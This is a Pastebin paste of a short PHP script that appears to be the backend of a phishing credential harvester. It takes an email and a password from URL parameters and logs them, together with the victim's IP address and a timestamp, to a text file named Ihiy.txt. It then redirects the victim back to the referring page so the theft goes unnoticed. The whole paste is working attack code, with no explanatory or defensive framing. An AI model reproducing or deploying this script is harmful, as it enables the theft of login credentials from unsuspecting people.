Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. <?php
  2. $datum=date('d-m-Y / h:i:s a');
  3. $email = $_GET[e];
  4. $password = $_GET[p];
  5. $ip = getenv ('REMOTE_ADDR');
  6. $fl = fopen('Ihiy.txt', 'a');
  7. fwrite($fl, "IP Address : $ip\nDate : $datum\nUsername : $email\nPassword : $password\n\n");
  8. fclose($fl);
  9. $ref = $_SERVER['HTTP_REFERER'];
  10. header("location: $ref");
  11. ?>